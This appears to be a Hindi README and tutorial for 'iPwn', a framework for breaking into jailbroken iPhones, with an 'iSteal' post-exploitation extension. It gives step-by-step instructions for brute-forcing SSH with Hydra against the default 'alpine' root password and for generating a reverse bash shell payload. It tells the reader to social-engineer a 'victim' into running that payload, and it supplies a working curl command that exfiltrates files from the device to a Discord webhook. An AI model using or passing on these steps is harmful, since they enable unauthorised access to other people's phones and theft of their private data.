
iOS उपकरणों के शोषण के लिए बनाया गया एक फ्रेमवर्क।
iOS उपकरणों के शोषण के लिए एक फ्रेमवर्क।

<!> याद रखें: इस टूल का उपयोग करके जिस iPhone में प्रवेश करने का प्रयास कर रहे हैं, वह जेलब्रेक होना चाहिए। <!>
यह प्रोजेक्ट अभी भी काम चल रहा है। मैं डिवाइस की जानकारी और अन्य चीजों को इकट्ठा करने के लिए पोस्ट-एक्सप्लॉइटेशन के लिए और अधिक एक्सटेंशन और विकल्प जोड़ रहा हूं। मैं एक सामान्य iOS ट्वीक में पेलोड डालने का एक तरीका भी काम कर रहा हूं ताकि रिवर्स शेल प्राप्त करना आसान हो सके।
[6/2/21] - अपने कंप्यूटर से जुड़े डिवाइस वाले लोगों के लिए एक अतिरिक्त मेनू जोड़ा गया जो उनके साथ छेड़छाड़ करना चाहते हैं। जल्द ही इसमें और जोड़ा जाएगा।
[6/2/21] - 'iSteal' पोस्ट-एक्सप्लॉइटेशन टूल के लिए 4 अतिरिक्त मॉड्यूल जोड़े गए। साथ ही checkra1n जेलब्रेक इंस्टॉल करने का विकल्प भी जोड़ा गया।
[5/25/21] - 'iSteal' पोस्ट-एक्सप्लॉइटेशन टूल के लिए 8 अतिरिक्त मॉड्यूल जोड़े गए।
[5/25/21] - 'iSteal' पोस्ट-एक्सप्लॉइटेशन टूल के लिए 2 अतिरिक्त मॉड्यूल जोड़े गए।
iPwn एक फ्रेमवर्क है जो iOS उपकरणों का शोषण करने और उन तक पहुंच प्राप्त करने के लिए है। इसमें एक एक्सटेंशन भी है जो 'iSteal' नामक एक मिनी-फ्रेमवर्क है जो पोस्ट-एक्सप्लॉइटेशन (डिवाइस तक पहुंच प्राप्त करने के बाद) के लिए है। यह विवरण आपको iOS डिवाइस तक पहुंच प्राप्त करने और उससे जानकारी प्राप्त करने के विभिन्न तरीकों और चरणों के बारे में बताएगा।
iOS डिवाइस तक पहुंच प्राप्त करने का पहला तरीका - SSH-बलपूर्वक प्रवेश (SSH-Bruteforcing)।
अधिकांश जेलब्रेक किए गए iOS डिवाइस जिनमें Cydia है, OpenSSH के साथ पहले से पैकेज होते हैं। और आमतौर पर, क्रेडेंशियल बहुत कमजोर या सामान्य होते हैं, सबसे सामान्य पासवर्डों में से एक उस वर्डलिस्ट में शामिल होगा जो यदि आपने मेरे Github से iPwn डाउनलोड किया है तो आपके फोल्डर में होना चाहिए।
तो चलिए शुरू करते हैं! सबसे पहले, हम स्क्रिप्ट चलाकर शुरू करेंगे।
python main.py
फिर, हम 'brute' कमांड टाइप करने जा रहे हैं। (यदि आप help टाइप करना चाहते हैं और कमांड से परिचित होना चाहते हैं, तो आप ऐसा कर सकते हैं।)

एक बार जब हम 'brute' कमांड टाइप कर लेते हैं। सभी उपलब्ध कमांड प्रदर्शित करने के लिए 'help' टाइप करें।
अब, हम सबसे सामान्य पासवर्ड वाली वर्डलिस्ट का उपयोग करके SSH-बलपूर्वक प्रवेश शुरू करने के लिए 'default' कमांड का उपयोग करेंगे।
आपसे लक्ष्य का IP पता दर्ज करने के लिए कहा जाएगा, कृपया सुनिश्चित करें कि आप सही और मान्य IP दर्ज कर रहे हैं, एंटर दबाएं, फिर अगले चरण पर जाएं।

<!> यदि आपको त्रुटियां मिल रही हैं, तो कृपया सुनिश्चित करें कि HYDRA इंस्टॉल है, आप नीचे दिए गए कमांड से HYDRA इंस्टॉल कर सकते हैं <!>
hydra इंस्टॉल करने के लिए कमांड:
sudo apt install hydra
sudo pacman -S hydra
अब वापस ट्यूटोरियल पर, यदि आपके पीसी पर hydra इंस्टॉल है, तो यह पहले से ही बलपूर्वक प्रवेश का प्रयास कर रहा होगा। लगभग 20-40 सेकंड रुकें और यदि डिवाइस वर्डलिस्ट में दिए गए डिफ़ॉल्ट/सामान्य क्रेडेंशियल का उपयोग करता है, तो Hydra आपको एक छोटा संदेश देगा जो सही पासवर्ड दिखाएगा।

जैसा कि हम देख सकते हैं, सही पासवर्ड 'alpine' है। अब हम दूसरे टर्मिनल विंडो पर 'ssh root@ip_goes_here' करके फोन में लॉगिन कर सकते हैं। एक बार जब यह आपसे पासवर्ड मांगे, तो बस Hydra से प्राप्त पासवर्ड दर्ज करें।

अब हम लॉग इन हैं!

इस बिंदु पर हम शायद फोन पर कुछ जानकारी एकत्र करना और इसे नियंत्रित करना चाहते हैं, वह बाद में आएगा। क्योंकि पहले, हमें कुछ बहुत महत्वपूर्ण चीजें इंस्टॉल करने की आवश्यकता है। यदि आप हर चीज को स्वचालित करने वाली सेटअप फ़ाइल को स्थानांतरित करने के लिए SCP का उपयोग करना चाहते हैं, तो आप ऐसा कर सकते हैं। फ़ाइल /post-exploitation/post.sh में है। एक बार जब आप 'post.sh' फ़ाइल को iOS डिवाइस पर स्थानांतरित कर लेते हैं, तो इसे 'bash post.sh' करके निष्पादित करें और यह उन पोस्ट-एक्सप्लॉइटेशन टूल्स को इंस्टॉल और सेटअप करना शुरू कर देगा जिनका हम उपयोग करेंगे।
<!> नोट: नीचे दिए गए कमांड केवल उन लोगों के लिए हैं जो आवश्यक पैकेज और टूल्स मैन्युअल रूप से इंस्टॉल करना चाहते हैं <!>
आवश्यक सब कुछ सेटअप/इंस्टॉल करने के लिए ये सभी कमांड चलाएं:
apt install netcat
apt install python3
apt install nano
git clone https://github.com/0x1CA3/iSteal.git
ठीक है, अब जब हमने सब कुछ इंस्टॉल कर लिया है, तो हम 'iSteal' फोल्डर में जा सकते हैं और 'iSteal' पोस्ट-एक्सप्लॉइटेशन स्क्रिप्ट चला सकते हैं।
python3 post.py
<!> नोट: सुनिश्चित करें कि जब आप python फ़ाइलें चलाने का प्रयास करें, तो "python" या "py" के बजाय "python3" का उपयोग करें <!>
तो अब स्क्रिप्ट लोड हो गई होगी, यदि आप 'help' कमांड का उपयोग करना चाहते हैं और चारों ओर देखना चाहते हैं, तो आप ऐसा कर सकते हैं।

अब, हम पोस्ट-एक्सप्लॉइटेशन के लिए उपलब्ध मॉड्यूल/विकल्प दिखाने के लिए 'list' कमांड का उपयोग करने जा रहे हैं।

<!> ध्यान रखें: पोस्ट-एक्सप्लॉइटेशन स्क्रिप्ट पर बहुत सारे अपडेट होंगे, और अधिक मॉड्यूल जोड़े जाएंगे, इसलिए सटीकता के लिए इस छवि को अपडेट किया जाएगा <!>
मॉड्यूल का उपयोग करने के लिए, बस 'use specific/module' करें। उदाहरण: use modules/list_installed_default_apps
और जैसा कि आप देख सकते हैं, जब हम उस मॉड्यूल को चलाते हैं, तो यह हमें लक्ष्य के iOS डिवाइस पर इंस्टॉल किए गए डिफ़ॉल्ट एप्लिकेशन दिखाता है।

iOS डिवाइस तक पहुंच प्राप्त करने का दूसरा तरीका - रिवर्स शेल।
अब, मैं आपको दिखाने जा रहा हूं कि दूसरे तरीके से कैसे किया जाता है, जो थोड़ा अधिक उन्नत है। ध्यान रखें, मैं इस भाग के लिए चित्र शामिल नहीं करूंगा।
'python main.py' करके iPwn फ्रेमवर्क चलाएं
'payload' कमांड टाइप करें
पेलोड फैक्टरी लोड होने की प्रतीक्षा करें।
अपनी पसंद का एक पेलोड चुनें, उदाहरण: use payloads/factory/reverse_bash
अपना IP दर्ज करें
अपना पोर्ट दर्ज करें
फिर आपको एक संदेश मिलना चाहिए जो कहता है 'payload generated'
मुख्य मेनू पर वापस जाने के लिए 'back' कमांड टाइप करें
आने वाले कनेक्शनों को सुनना शुरू करने के लिए 'listen' कमांड टाइप करें
सुनिश्चित करें कि आपका पीड़ित टर्मिनल के माध्यम से या अपने तरीके से स्क्रिप्ट चलाता है, सोशल इंजीनियरिंग का प्रयास करें, रचनात्मक बनें!
एक बार जब पीड़ित के iOS डिवाइस पर स्क्रिप्ट निष्पादित हो जाती है, तो आपको एक कनेक्शन मिलना चाहिए
/post-exploitation में स्थित 'post.sh' को स्थानांतरित करके और इसे निष्पादित करके या स्वयं मैन्युअल रूप से करके महत्वपूर्ण पैकेज इंस्टॉल करें
अब आप 'iSteal' या 'AutoEnum' पोस्ट-एक्सप्लॉइटेशन टूल्स चला सकते हैं
मज़े करो! :)
<!> यदि आप चरण 2 कर रहे हैं और महत्वपूर्ण पैकेज/टूल्स इंस्टॉल करने वाले भाग पर अटक जाते हैं, तो चरण 1 में जाएं और पैकेज/टूल्स इंस्टॉल करने के लिए गाइड कॉपी करें! <!>
iOS डिवाइस पर फ़ाइलें स्थानांतरित करने के कई तरीके हैं और उन्हें डाउनलोड करने के भी कई तरीके हैं। iOS डिवाइस से फ़ाइलें निकालने और डाउनलोड करने का सबसे आसान तरीका Curl और एक डिस्कॉर्ड वेबहुक का उपयोग करना है।
<!> नोट: नीचे दिया गया खंड प्रदर्शित करेगा कि curl का उपयोग करके iOS डिवाइस से फ़ाइलें कैसे निकालें और डाउनलोड करें <!>
चरण 1: एक डिस्कॉर्ड सर्वर बनाएं
चरण 2: एक वेबहुक बनाएं और लिंक कॉपी करें
चरण 3: iOS डिवाइस पर, उस निर्देशिका पर नेविगेट करें जिसमें वह फ़ाइल है जिसे आप प्राप्त करना चाहते हैं।
चरण 4: नीचे दिया गया कमांड दर्ज करें (file_here.txt को अपनी फ़ाइल के नाम से बदलें, webhook_url_here को अपने वेबहुक URL से बदलें)
curl -i -H 'Expect: application/json' -F file=@file_here.txt -F 'payload_json={ "wait": true, "content": "", "username": "" }' webhook_url_here
चरण 5: लगभग 10-50 सेकंड प्रतीक्षा करें
हो गया! फ़ाइल अब आपके डिस्कॉर्ड सर्वर पर अपलोड हो जानी चाहिए। अब आप फ़ाइल डाउनलोड/देख सकते हैं।
Windows 10 - स्थिर
Garuda Linux - स्थिर
आर्क आधारित वितरण - स्थिर
समर्थित डिवाइस [पोस्ट-एक्सप्लॉइटेशन एक्सटेंशन इन सभी के लिए काम करना चाहिए]
-----------------
चौथी पीढ़ी के iPod से नए iPods
iPhone 4
iPhone 4S
iPhone 5
iPhone 6
iPhone SE
iPhone 7
iPhone 7+
iPhone 8
iPhone 8+
iPhone X
iPhone XR
iPhone XS
iPhone 11
iPhone 12
मेरे अपने परीक्षण किए गए डिवाइस [जिनका मैंने स्वयं व्यक्तिगत रूप से परीक्षण किया है]
---------------------
iPhone 4S
iPhone 5S
iPhone SE
iPhone 7+
iPad Air
iPod चौथी पीढ़ी
